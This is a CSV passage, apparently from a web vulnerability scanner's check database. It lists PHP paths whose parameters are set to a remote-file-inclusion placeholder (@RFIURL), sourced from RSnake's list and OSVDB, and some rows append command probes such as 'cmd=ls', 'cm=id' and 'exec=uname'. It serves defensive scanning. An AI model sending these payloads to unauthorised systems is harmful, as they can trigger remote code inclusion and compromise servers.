"004352","5292","c","/calendar/demo/index.php?date=&v=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004353","5292","c","/calendar/payment.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004354","5292","c","/calendario/cal_insert.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004355","5292","c","/calendario/cal_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004356","5292","c","/calendario/cal_saveactivity.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004357","5292","c","/cart.php?lang_list=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004358","5292","c","/cart_content.php?cart_isp_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004359","5292","c","/catalogg/inludes/include_once.php?include_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004360","5292","c","/catalogshop.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004361","5292","c","/cdsagenda/modification/SendAlertEmail.php?AGE=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004362","5292","c","/cfagcms/themes/default/index.php?main=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004363","5292","c","/ch_readalso.php?read_xml_include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004364","5292","c","/challenge.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004365","5292","c","/challenge.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004366","5292","c","/change_preferences2.php?target=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004367","5292","c","/chat.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004368","5292","c","/chat.php?my[root]=@RFIURL?cm=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004369","5292","c","/chat/adminips.php?banned_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004370","5292","c","/chat/users_popupL.php3?From=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004371","5292","c","/checkout.php?abs_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004372","5292","c","/checkout.php?abs_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004373","5292","c","/ciamos_path/modules/forum/include/config.php?module_cache_path='@RFIURL'","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004374","5292","c","/circ.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004375","5292","c","/circolari/cir_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004376","5292","c","/citywriter/head.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004377","5292","c","/cl_files/index.php?path_to_calendar=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004378","5292","c","/claroline/auth/ldap/authldap.php?includePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004379","5292","c","/claroline/phpbb/page_tail.php?includePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004380","5292","c","/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004381","5292","c","/class.mysql.php?path_to_bt_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004382","5292","c","/class/Wiki/Wiki.php?c_node[class_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004383","5292","c","/class/jpcache/jpcache.php?_PSL[classdir]=@RFIURL?exec=uname","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004384","5292","c","/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004385","5292","c","/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004386","5292","c","/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004387","5292","c","/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004388","5292","c","/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004389","5292","c","/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004390","5292","c","/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004391","5292","c","/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004392","5292","c","/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004393","5292","c","/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004394","5292","c","/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004395","5292","c","/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004396","5292","c","/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004397","5292","c","/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004398","5292","c","/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004399","5292","c","/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004400","5292","c","/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004401","5292","c","/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004402","5292","c","/classes/Cache.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004403","5292","c","/classes/Customer.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004404","5292","c","/classes/Performance.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004405","5292","c","/classes/Project.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004406","5292","c","/classes/Representative.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004407","5292","c","/classes/User.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004408","5292","c","/classes/admin_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004409","5292","c","/classes/adodbt/sql.php?classes_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004410","5292","c","/classes/adodbt/sql.php?classes_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004411","5292","c","/classes/board_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004412","5292","c","/classes/class_admin.php?PathToComment=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004413","5292","c","/classes/class_comments.php?PathToComment=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004414","5292","c","/classes/class_mail.inc.php?path_to_folder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004415","5292","c","/classes/common.php?rootdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004416","5292","c","/classes/core/language.php?rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004417","5292","c","/classes/dev_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004418","5292","c","/classes/file_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004419","5292","c","/classes/html/com_articles.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004420","5292","c","/classes/phpmailer/class.cs_phpmailer.php?classes_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004421","5292","c","/classes/query.class.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004422","5292","c","/classes/tech_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004423","5292","c","/classified.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004424","5292","c","/classified_right.php?language_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004425","5292","c","/classifieds/index.php?lowerTemplate=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004426","5292","c","/clear.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004427","5292","c","/clearinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004428","5292","c","/click.php?dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004429","5292","c","/client.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004430","5292","c","/client/faq_1/PageController.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004431","5292","c","/clients/index.php?src=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004432","5292","c","/cls_fast_template.php?fname=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004433","5292","c","/cm68news/engine/oldnews.inc.php?addpath=@RFIURL?&","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004434","5292","c","/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004435","5292","c","/cms/meetweb/classes/ManagerResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004436","5292","c","/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004437","5292","c","/cms/meetweb/classes/RegForm.class.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004438","5292","c","/cms/meetweb/classes/RegResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004439","5292","c","/cms/meetweb/classes/RegRightsResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004440","5292","c","/cms/meetweb/classes/modules.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004441","5292","c","/cms/modules/form.lib.php?sourceFolder=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004442","5292","c","/cms/system/openengine.php?oe_classpath=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004443","5292","c","/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004444","5292","c","/cn_config.php?tpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004445","5292","c","/coast/header.php?sections_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004446","5292","c","/code/berylium-classes.php?beryliumroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004447","5292","c","/code/berylium-classes.php?beryliumroot=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004448","5292","c","/code/display.php?admindir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004449","5292","c","/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004450","5292","c","/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004451","5292","c","/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004452","5292","c","/com_media_library/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004453","5292","c","/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004454","5292","c","/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004455","5292","c","/comments.php?AMG_serverpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004456","5292","c","/comments.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004457","5292","c","/common.inc.php?CFG[libdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004458","5292","c","/common.inc.php?CFG[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004459","5292","c","/common.inc.php?base_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004460","5292","c","/common.php?db_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004461","5292","c","/common.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004462","5292","c","/common.php?ezt_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004463","5292","c","/common.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004464","5292","c","/common.php?livealbum_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004465","5292","c","/common.php?livealbum_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004466","5292","c","/common.php?locale=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004467","5292","c","/common.php?phpht_real_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004468","5292","c","/common/db.php?commonpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004469","5292","c","/common/func.php?CommonAbsD=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004470","5292","c","/common/func.php?CommonAbsDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004471","5292","c","/community/Offline.php?sourcedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004472","5292","c","/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004473","5292","c","/components/calendar/com_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004474","5292","c","/components/calendar/com_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004475","5292","c","/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004476","5292","c","/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004477","5292","c","/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004478","5292","c","/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004479","5292","c","/components/com_articles.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004480","5292","c","/components/com_articles.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004481","5292","c","/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004482","5292","c","/components/com_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004483","5292","c","/components/com_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004484","5292","c","/components/com_cpg/cpg.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004485","5292","c","/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004486","5292","c","/components/com_facileforms/facileforms.frame.php?ff_compath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004487","5292","c","/components/com_forum/download.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004488","5292","c","/components/com_galleria/galleria.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004489","5292","c","/components/com_guestbook.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004490","5292","c","/components/com_hashcash/server.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004491","5292","c","/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004492","5292","c","/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004493","5292","c","/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004494","5292","c","/components/com_joomlaboard/file_upload.php?sbp=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004495","5292","c","/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004496","5292","c","/components/com_lm/archive.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004497","5292","c","/components/com_mambowiki/MamboLogin.php?IP=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004498","5292","c","/components/com_minibb.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
